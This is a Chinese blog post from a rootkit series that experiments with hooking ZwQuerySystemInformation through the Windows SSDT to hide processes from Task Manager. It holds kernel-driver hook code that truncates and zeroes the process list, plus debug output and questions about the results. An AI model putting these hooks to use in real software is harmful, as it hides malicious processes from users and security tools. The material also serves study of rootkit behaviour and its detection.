S.l.e!ep.￠%

像打了激速一樣，以四倍的速度運(yùn)轉(zhuǎn)，開(kāi)心的工作
簡(jiǎn)單、開(kāi)放、平等的公司文化；尊重個(gè)性、自由與個(gè)人價(jià)值；

posts - 1098, comments - 335, trackbacks - 0, articles - 1

C++博客 :: 首頁(yè) :: 新隨筆 :: 聯(lián)系 :: 聚合

HOOK SSDT Hide Process （八）

Posted on 2009-10-28 14:38 S.l.e!ep.￠% 閱讀(346) 評(píng)論(0) 編輯收藏引用所屬分類(lèi): RootKit

[資料] http://m.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

繼 HOOK SSDT Hide Process （七）

用 HOOK SSDT Hide Process （七）? 的代碼雖然隱藏了進(jìn)程，但會(huì)導(dǎo)致在 taskmgr.exe 全部進(jìn)程看不到
而且運(yùn)行一段時(shí)間后， taskmgr.exe 就會(huì)非法關(guān)閉

Q:
今天突然發(fā)現(xiàn)，如果 taskmgr.exe 中選中了 'Show processes from all users' 選項(xiàng)，還是可以看到其它進(jìn)程的（taskmgr.exe成功隱藏），但為什么不選中就所以進(jìn)程看不到？這么鬼異的問(wèn)題估計(jì)要OD下 taskmgr.exe 才知道

為了一查究竟，我把 MyZwQuerySystemInformation 修改成如下的代碼

NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????IN?PVOID?SystemInformation,?
????????????????????IN?ULONG?SystemInformationLength,?
????????????????????OUT?PULONG?ReturnLength)?//定義自己的Hook函數(shù)
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(&process_name,?L"taskmgr.exe");
????
????rc?=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????if(NT_SUCCESS(rc))?
????{
????????
????????if(5?==?SystemInformationClass)
????????{?
????????????
????????????struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????struct?_SYSTEM_PROCESSES?*prev?=?NULL;?
????????????
????????????//if(curr->NextEntryDelta)
????????????//????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????
????????????while(curr)
????????????{
????????????????????????????????KdPrint(("ProcessName:%wZ?NextEntryDelta:%d?\n",?&curr->ProcessName,?curr->NextEntryDelta));
????????
????????????????if(curr->NextEntryDelta)
????????????????????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);
????????????????else
????????????????????curr?=?NULL;
????????????????????
????????????????
????????????}//?while(curr)?
????????????????????????
????????????????????????????????UnHook();????????????

????????}//?if(5?==?SystemInformationClass)
????????
????}//?if(NT_SUCCESS(rc))
????

????//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully

.?\n"));
????return?rc;
}

在 DebugView 中顯示的內(nèi)容如下:

Entry?Hook?Function!
Entry?Hook()
KeServiceDescriptorTable->ServiceTableBase?is?:0x804e2d20
OldZwQuerySystemInformation?is?:0x8057cc27
MyZwQuerySystemInformation?is?:0xf8f0c080
Leave?DriverEntry!
ProcessName:(null)?NextEntryDelta:248?
ProcessName:System?NextEntryDelta:3528?
ProcessName:smss.exe?NextEntryDelta:400?
ProcessName:csrss.exe?NextEntryDelta:912?
ProcessName:winlogon.exe?NextEntryDelta:1304?
ProcessName:services.exe?NextEntryDelta:1176?
ProcessName:lsass.exe?NextEntryDelta:1360?
ProcessName:vmacthlp.exe?NextEntryDelta:280?
ProcessName:svchost.exe?NextEntryDelta:1360?
ProcessName:svchost.exe?NextEntryDelta:656?
ProcessName:svchost.exe?NextEntryDelta:3664?
ProcessName:svchost.exe?NextEntryDelta:464?
ProcessName:svchost.exe?NextEntryDelta:1104?
ProcessName:explorer.exe?NextEntryDelta:920?
ProcessName:spoolsv.exe?NextEntryDelta:848?
ProcessName:VMwareService.exe?NextEntryDelta:416?
ProcessName:VMwareTray.exe?NextEntryDelta:280?
ProcessName:VMwareUser.exe?NextEntryDelta:536?
ProcessName:ctfmon.exe?NextEntryDelta:272?
ProcessName:wscntfy.exe?NextEntryDelta:272?
ProcessName:alg.exe?NextEntryDelta:584?
ProcessName:cmd.exe?NextEntryDelta:264?
ProcessName:conime.exe?NextEntryDelta:272?
ProcessName:DriverMonitor.exe?NextEntryDelta:608?
ProcessName:notepad.exe?NextEntryDelta:272?
ProcessName:taskmgr.exe?NextEntryDelta:400?
ProcessName:Dbgview.exe?NextEntryDelta:0?
Unhook?leave!

接著再做一個(gè)嘗試，如果直接把第二個(gè)線程的信息的 NextEntryDelta 改為0 ，是不是 taskmgr.exe 就會(huì)只顯示一條線程？

NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????IN?PVOID?SystemInformation,?
????????????????????IN?ULONG?SystemInformationLength,?
????????????????????OUT?PULONG?ReturnLength)?//定義自己的Hook函數(shù)
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(&process_name,?L"taskmgr.exe");
????
????rc?=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????if(NT_SUCCESS(rc))?
????{
????????
????????if(5?==?SystemInformationClass)
????????{?
????????????
????????????struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????struct?_SYSTEM_PROCESSES?*prev?=?NULL;?
????????????
????????????if(curr->NextEntryDelta)
????????????????????????{
??????????????????????????curr->NextEntryDelta?=?0;
????????????}
????????????????????????
????????????????????????//????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????
????????????????????????/*
????????????while(curr)
????????????{
????????????????????????????????KdPrint(("ProcessName:%wZ?NextEntryDelta:%d?\n",?&curr->ProcessName,?curr->NextEntryDelta));
????????
????????????????if(curr->NextEntryDelta)
????????????????????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);
????????????????else
????????????????????curr?=?NULL;
????????????????????
????????????????
????????????}//?while(curr)?
????????????????*/????????
?????????????????//???????????????UnHook();????????????

????????}//?if(5?==?SystemInformationClass)
????????
????}//?if(NT_SUCCESS(rc))
????

????//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully

.?\n"));
????return?rc;
}

情況還是?taskmgr.exe 中選中了 'Show processes from all users' 選項(xiàng)，就會(huì)顯示一條 System Idle Process 線程，如果不選中
'Show processes from all users' 這個(gè)選項(xiàng)，那么 Taskmgr.exe 的列表就會(huì)顯示為空

curr->NextEntryDelta?=?0; 那為何不把 curr 之后的數(shù)全部置為 0x00 ?
于是，加多幾句代碼

??????????????if(curr->NextEntryDelta)
????????????{
??????????????????????????KdPrint(("SystemInformationLength:%d?\n",?SystemInformationLength));
??????????????????????????curr->NextEntryDelta?=?0;
??????????????????????????memset((void*)((ULONG)curr?+?curr->NextEntryDelta),?0x00,?SystemInformationLength?-?curr->NextEntryDelta);
????????????}

此時(shí)，無(wú)論有無(wú)選中 'Show Process From all users'選項(xiàng)，所有進(jìn)程都不顯示在 taskmgr.exe 了
另外還發(fā)現(xiàn)兩個(gè)現(xiàn)象
Q1. taskmgr.exe 調(diào)用 ZwQuerySystemInformation 時(shí)，ReturnLength?指針總是傳 NULL
Q2. taskmgr.exe 調(diào)用 ZwQuerySystemInformation 時(shí)，SystemInformationLength 總是傳 0x6000
難道 taskmgr.exe 并不是通過(guò) NextEntryData 這個(gè)值來(lái)定位到下個(gè)進(jìn)程的信息的？
?

只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。


相關(guān)文章: Load Driver protect_pwd.txt Windows下Hook API技術(shù) inline hook 對(duì)付API-splicing的一種簡(jiǎn)單方法修改IAT實(shí)現(xiàn)API HOOK API-HOOK and ANTI-API-HOOK For Ring3 API Hook jmp 法 DirectX Input 鍵盤(pán)實(shí)現(xiàn) 收藏一個(gè)反鍵盤(pán)記錄工具的分析不用hook 實(shí)現(xiàn)掛機(jī)鎖

網(wǎng)站導(dǎo)航: 博客園 IT新聞 BlogJava 博問(wèn) Chat2DB 管理

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.￠%

HOOK SSDT Hide Process （八）

[資料] http://m.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

日歷

公告

常用鏈接

留言簿(5)

隨筆分類(lèi)(1107)

隨筆檔案(1098)

文章檔案(1)

相冊(cè)

收藏夾(3)

DataStruct

搜索

積分與排名

最新評(píng)論

閱讀排行榜

評(píng)論排行榜